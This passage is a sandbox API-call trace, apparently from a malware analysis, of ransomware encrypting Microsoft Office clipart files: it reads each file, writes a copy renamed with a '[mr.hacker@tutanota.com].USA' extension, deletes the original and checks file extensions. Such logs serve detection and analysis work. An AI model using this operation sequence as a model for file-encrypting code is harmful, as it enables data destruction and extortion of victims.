dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.049] SetEndOfFile (hFile=0x3a8) returned 1 [0273.051] CloseHandle (hObject=0x3a8) returned 1 [0273.051] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.051] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01461_.wmf")) returned 1 [0273.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 63 [0273.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 63 [0273.052] lstrlenW (lpString=".doc") returned 4 [0273.052] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.052] lstrlenW (lpString=".docx") returned 5 [0273.052] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.052] lstrlenW (lpString=".pdf") returned 4 [0273.052] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.052] lstrlenW (lpString=".xls") returned 4 [0273.052] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.052] lstrlenW (lpString=".xlsx") returned 5 [0273.052] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.052] lstrlenW (lpString=".ppt") returned 4 [0273.052] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 63 [0273.052] lstrlenW (lpString=".zip") returned 4 [0273.052] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.052] lstrlenW (lpString=".rar") returned 4 [0273.052] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.052] lstrlenW (lpString=".bz2") returned 4 [0273.052] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.052] lstrlenW (lpString=".7z") returned 3 [0273.052] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 63 [0273.052] lstrlenW (lpString=".dbf") returned 4 [0273.052] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 63 [0273.052] lstrlenW (lpString=".1cd") returned 4 [0273.052] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 63 [0273.053] lstrlenW (lpString=".jpg") returned 4 [0273.053] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 63 [0273.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 63 [0273.053] lstrlenW (lpString=".doc") returned 4 [0273.053] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.053] lstrlenW (lpString=".docx") returned 5 [0273.053] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.053] lstrlenW (lpString=".pdf") returned 4 [0273.053] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.053] lstrlenW (lpString=".xls") returned 4 [0273.053] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.053] lstrlenW (lpString=".xlsx") returned 5 [0273.053] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.053] lstrlenW (lpString=".ppt") returned 4 [0273.053] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 63 [0273.053] lstrlenW (lpString=".zip") returned 4 [0273.053] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.053] lstrlenW (lpString=".rar") returned 4 [0273.053] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.053] lstrlenW (lpString=".bz2") returned 4 [0273.053] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.053] lstrlenW (lpString=".7z") returned 3 [0273.053] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 63 [0273.053] lstrlenW (lpString=".dbf") returned 4 [0273.053] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 63 [0273.053] lstrlenW (lpString=".1cd") returned 4 [0273.053] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 63 [0273.054] lstrlenW (lpString=".jpg") returned 4 [0273.054] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.054] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.054] lstrlenW (lpString="HH01618_.WMF") returned 12 [0273.054] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01618_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0273.054] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=7296) returned 1 [0273.054] CloseHandle (hObject=0x3a8) returned 1 [0273.054] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01618_.wmf")) returned 0x20 [0273.054] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01618_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.054] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01618_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0273.054] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.054] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.055] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01618_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0273.055] GetLastError () returned 0x0 [0273.055] ReadFile (in: hFile=0x3a8, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x1c80, lpOverlapped=0x0) returned 1 [0273.081] WriteFile (in: hFile=0x388, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x1c90, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x1c90, lpOverlapped=0x0) returned 1 [0273.082] ReadFile (in: hFile=0x3a8, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.082] WriteFile (in: hFile=0x388, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.082] SetEndOfFile (hFile=0x388) returned 1 [0273.082] CloseHandle (hObject=0x388) returned 1 [0273.082] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.082] SetEndOfFile (hFile=0x3a8) returned 1 [0273.084] CloseHandle (hObject=0x3a8) returned 1 [0273.085] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.110] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01618_.wmf")) returned 1 [0273.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 63 [0273.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 63 [0273.110] lstrlenW (lpString=".doc") returned 4 [0273.111] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.111] lstrlenW (lpString=".docx") returned 5 [0273.111] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.111] lstrlenW (lpString=".pdf") returned 4 [0273.111] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.111] lstrlenW (lpString=".xls") returned 4 [0273.111] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.111] lstrlenW (lpString=".xlsx") returned 5 [0273.111] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.111] lstrlenW (lpString=".ppt") returned 4 [0273.111] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 63 [0273.111] lstrlenW (lpString=".zip") returned 4 [0273.111] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.111] lstrlenW (lpString=".rar") returned 4 [0273.111] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.111] lstrlenW (lpString=".bz2") returned 4 [0273.111] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.111] lstrlenW (lpString=".7z") returned 3 [0273.111] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 63 [0273.111] lstrlenW (lpString=".dbf") returned 4 [0273.111] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 63 [0273.111] lstrlenW (lpString=".1cd") returned 4 [0273.111] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 63 [0273.111] lstrlenW (lpString=".jpg") returned 4 [0273.111] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 63 [0273.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 63 [0273.112] lstrlenW (lpString=".doc") returned 4 [0273.112] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.112] lstrlenW (lpString=".docx") returned 5 [0273.112] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.112] lstrlenW (lpString=".pdf") returned 4 [0273.112] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.112] lstrlenW (lpString=".xls") returned 4 [0273.112] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.112] lstrlenW (lpString=".xlsx") returned 5 [0273.112] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.112] lstrlenW (lpString=".ppt") returned 4 [0273.112] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 63 [0273.112] lstrlenW (lpString=".zip") returned 4 [0273.112] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.112] lstrlenW (lpString=".rar") returned 4 [0273.112] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.112] lstrlenW (lpString=".bz2") returned 4 [0273.112] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.112] lstrlenW (lpString=".7z") returned 3 [0273.112] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 63 [0273.112] lstrlenW (lpString=".dbf") returned 4 [0273.112] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 63 [0273.112] lstrlenW (lpString=".1cd") returned 4 [0273.112] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 63 [0273.112] lstrlenW (lpString=".jpg") returned 4 [0273.112] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.113] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.113] lstrlenW (lpString="HH02155_.WMF") returned 12 [0273.113] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02155_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.113] GetFileSizeEx (in: hFile=0x2b0, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=2704) returned 1 [0273.113] CloseHandle (hObject=0x2b0) returned 1 [0273.113] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02155_.wmf")) returned 0x20 [0273.113] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02155_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.113] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02155_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.113] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.113] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.113] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02155_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0273.114] GetLastError () returned 0x0 [0273.114] ReadFile (in: hFile=0x2b0, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0xa90, lpOverlapped=0x0) returned 1 [0273.142] WriteFile (in: hFile=0x3b0, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xaa0, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xaa0, lpOverlapped=0x0) returned 1 [0273.151] ReadFile (in: hFile=0x2b0, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.151] WriteFile (in: hFile=0x3b0, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.151] SetEndOfFile (hFile=0x3b0) returned 1 [0273.151] CloseHandle (hObject=0x3b0) returned 1 [0273.151] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.151] SetEndOfFile (hFile=0x2b0) returned 1 [0273.154] CloseHandle (hObject=0x2b0) returned 1 [0273.154] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.154] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02155_.wmf")) returned 1 [0273.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 63 [0273.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 63 [0273.155] lstrlenW (lpString=".doc") returned 4 [0273.155] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.155] lstrlenW (lpString=".docx") returned 5 [0273.155] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.155] lstrlenW (lpString=".pdf") returned 4 [0273.155] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.155] lstrlenW (lpString=".xls") returned 4 [0273.155] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.155] lstrlenW (lpString=".xlsx") returned 5 [0273.155] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.155] lstrlenW (lpString=".ppt") returned 4 [0273.155] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 63 [0273.155] lstrlenW (lpString=".zip") returned 4 [0273.155] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.155] lstrlenW (lpString=".rar") returned 4 [0273.155] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.155] lstrlenW (lpString=".bz2") returned 4 [0273.155] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.155] lstrlenW (lpString=".7z") returned 3 [0273.155] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 63 [0273.155] lstrlenW (lpString=".dbf") returned 4 [0273.155] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 63 [0273.155] lstrlenW (lpString=".1cd") returned 4 [0273.155] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 63 [0273.155] lstrlenW (lpString=".jpg") returned 4 [0273.156] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 63 [0273.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 63 [0273.156] lstrlenW (lpString=".doc") returned 4 [0273.156] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.156] lstrlenW (lpString=".docx") returned 5 [0273.156] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.156] lstrlenW (lpString=".pdf") returned 4 [0273.156] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.156] lstrlenW (lpString=".xls") returned 4 [0273.156] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.156] lstrlenW (lpString=".xlsx") returned 5 [0273.156] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.156] lstrlenW (lpString=".ppt") returned 4 [0273.156] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 63 [0273.156] lstrlenW (lpString=".zip") returned 4 [0273.156] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.156] lstrlenW (lpString=".rar") returned 4 [0273.156] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.156] lstrlenW (lpString=".bz2") returned 4 [0273.156] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.156] lstrlenW (lpString=".7z") returned 3 [0273.156] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 63 [0273.156] lstrlenW (lpString=".dbf") returned 4 [0273.156] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 63 [0273.156] lstrlenW (lpString=".1cd") returned 4 [0273.156] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 63 [0273.157] lstrlenW (lpString=".jpg") returned 4 [0273.157] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.157] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.157] lstrlenW (lpString="HH02298_.WMF") returned 12 [0273.157] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02298_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0273.172] GetFileSizeEx (in: hFile=0x2bc, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=5552) returned 1 [0273.172] CloseHandle (hObject=0x2bc) returned 1 [0273.172] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02298_.wmf")) returned 0x20 [0273.180] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02298_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.218] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02298_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0273.218] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.218] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.219] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02298_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0273.219] GetLastError () returned 0x0 [0273.219] ReadFile (in: hFile=0x3b0, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x15b0, lpOverlapped=0x0) returned 1 [0273.233] WriteFile (in: hFile=0x390, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x15c0, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x15c0, lpOverlapped=0x0) returned 1 [0273.234] ReadFile (in: hFile=0x3b0, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.234] WriteFile (in: hFile=0x390, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.234] SetEndOfFile (hFile=0x390) returned 1 [0273.234] CloseHandle (hObject=0x390) returned 1 [0273.234] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.234] SetEndOfFile (hFile=0x3b0) returned 1 [0273.236] CloseHandle (hObject=0x3b0) returned 1 [0273.236] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.236] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02298_.wmf")) returned 1 [0273.237] lstrlenW 